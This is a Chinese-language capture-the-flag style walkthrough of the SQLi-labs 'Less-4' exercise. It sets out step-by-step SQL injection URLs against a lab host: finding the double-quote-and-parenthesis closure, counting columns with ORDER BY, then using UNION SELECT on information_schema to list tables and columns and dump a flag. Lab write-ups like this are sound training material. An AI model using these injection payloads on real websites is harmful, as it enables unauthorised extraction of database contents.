Less-4

Less-4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）

1.判断是否存在注入

https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3' --+

正常回显

https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3" --+

错误回显 => 存在注入点

2.判断参数类型

https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3 and 1=2  --+

正确回显 => 字符型注入

3.进行参数闭合

https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3" and 1=2  --+

错误回显

 https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3" and 1=1  --+

错误回显 => 第一正确

https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3") and 1=1  --+

正确回显 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3") order by 3  --+

正确回显

https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3") order by 4  --+

错误回显 => 有3列

5.查看数据库的表

https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=-3") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

6.查看NCdmJewX表中的列

https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=-3") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="NCdmJewX" --+

7.查看表中的flag列中的数据

 https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=-3") union select 1,2,group_concat(flag) from NCdmJewX --+